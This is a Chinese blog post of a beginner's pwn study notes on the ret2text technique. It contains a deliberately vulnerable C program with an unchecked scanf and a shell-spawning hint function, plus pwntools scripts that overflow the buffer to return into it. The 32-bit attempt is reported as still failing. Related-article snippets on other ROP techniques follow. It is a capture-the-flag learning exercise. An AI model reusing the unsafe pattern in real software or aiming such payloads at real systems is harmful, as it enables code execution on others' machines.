pwn学习day4——ret2text

最新推荐文章于 2024-01-22 09:06:16 发布
最新推荐文章于 2024-01-22 09:06:16 发布
阅读量427 收藏
点赞数 1
分类专栏: 二进制逆向 文章标签: 学习
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/131441332
版权

文章目录

原理:

覆盖函数返回地址到程序内存在的gadgets获取shell

例子

#include<stdio.h>
#include<stdlib.h>

void hint(){
    system("$0");
}
int main(){
    char buf[0x10];
    printf("input: ");
    scanf("%s", buf);
    return 0;
}
// gcc ret2text.c -o ret2text_64 -no-pie -fno-stack-protector
// gcc ret2text.c -o ret2text_32 -no-pie -fno-stack-protector -m32

x64

直接溢出至hint函数处即可

img解题:

from pwn import *

o = process("ret2text_64")

hint = 0x4005D6
payload = b'a'*24 + p64(hint)
o.sendline(payload)
o.interactive()

img

x32

32位这里遇到个问题,按理来说覆盖长度为0x18+4

img

找到hint函数地址就可以解出题目了,但是打死都不行。

from pwn import *

o = process("ret2text_32")
hint = 0x804849B
pause()
payload = b'a'*(0x18+4) + p32(hint)
o.sendline(payload)

o.interactive()

img

gdb断点至scanf函数处,也没看出来哪里出现了问题

img

问大佬说是因为需要绕过ecx

img

太菜暂未解决。

天问_Herbert555
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2text知识点及例题
weixin_44864859的博客
05-19 1376
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
入门pwn题目ret2text
03-26
入门pwn题目ret2text
[PWN][进阶篇]ROP_Ret2Shellcode-32实例
网络安全知识分享
03-24 3185
ROP_Ret2Shellcode-32实例一、相关知识二、实例教学 一、相关知识 之前我们说过ret2text漏洞是依赖于程序中存在执行 system("/bin/sh")的函数,那么如何解决ret2text的局限性 ret2textshellcode 没有执行shell的函数,没有开启NX保护 传入自定义的shellcode ret2libc 开启NX(可写的不可执行) 使用libc函数,leak libc + ROP 什么是shellcode? 通常是开启一个shell Linux的系统调用 /usr
pwn基本ROP——ret2text
turtlesd的博客
04-25 853
ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理 控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限 漏洞分析 利用checksec [file_name]指令获取可执行文件的保护措施开放情况 命令: checksec ret2text 可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。 也就是
pwn刷题num32----ret2text
tbsqigongzi的博客
04-27 431
BUUCTF-PWN-jarvisoj_level2_x64 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 未开启RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x200字节放在buf处,而buf只有0x80字节大小,可以覆盖返
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 3226
pwn笔记 - ret2text - 函数传参
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2text
weixin_56301399的博客
07-20 455
第二步还是用反汇编,获取到system函数的地址。由于要完整调用,所以取lea指令的位置0x00000000004007b8,也就是0x4007b8。第一步利用反汇编,查看变量的位置,为[rbp-0x70]。从IDA中可以看出,pwn程序只有这两个用户函数,其他的都是库函数。让返回地址,也就是EIP指向system(‘/bin/sh’)所在语句对应的内存地址就能获得shell。局部变量s是用户可以通过gets()输入的,只要达到特定的长度L,就能覆盖掉黄色的返回地址。......
pwn刷题num28---ret2text
tbsqigongzi的博客
04-27 272
BUUCTF-PWN- jarvisoj_level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x100字节放在buf处,而buf只有0x88字节大小,可以覆盖返回地
CTF学习笔记——ret2text
weixin_66578482的博客
12-10 361
ret2text 应该算是PWN里面比较简单的题型了,这种题型有个显著特征,就是会有个很明显的后门函数,也就是,我们只需要将我们的程序跳转到后门函数即可。不过我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。不过程序也可能会开启某些保护,我们需要想办法去绕过这些保护,这些我们就到后面来介绍。
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6277
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 1741
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出? 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
pwn-栈溢出】— ret2text
weixin_43988488的博客
03-19 547
使用checksec检查程序的架构以及保护情况寻找程序漏洞函数,比如如gets,scanf等计算目标变量的在堆栈中与栈底(32:ebp,64:rbp)的之间偏移查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等分析是否有字符串/bin/sh,将它作为system的参数在此程序中,它直接提供一个后门函数,供我们使用。
PWN基础9:使用 gdb 附加调试 64位程序
prettyX的博客
07-12 1214
场景描述 此节课,我们讨论的问题场景如下:在做PWN题时,完成调试分析后,开始着手写Exp,在写Exp时一般不会一次写成功,此时我们需要调试分析问题出在哪里。那么此时,我们可以在Exp中,设置一个暂停,随后,通过gdb附加调试我们的ELF分析对象,此时Exp发送Payload,在ELF程序接收到后,再分析Payload在程序的栈等数据结构中的部署情况,找出错误,完成最后的Exp。OK,上述就是我们今天研究问题的大致场景 开始 这节课我们研究的源码如下 //L9.c #include <std
从零开始做题:逆向 ret2text level2_x64
最新发布
weixin_44626085的博客
01-22 762
【代码】从零开始做题:逆向 ret2text level2_x64。
[PWN][进阶篇]Rop-Ret2Text介绍及实例教学
网络安全知识分享
03-22 6380
Rop-Ret2Text介绍及实例教学1、前提知识2、实例教学 1、前提知识 什么是Rop系统攻击 是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP也有其不同于正常程序的内在特征: (1)ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开始和结束; (2)ROP控制流中,jmp指令在不同的库函数甚至不同的库之间跳转,攻击者抽取的指令序列可能取自任意一个二进制文件
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值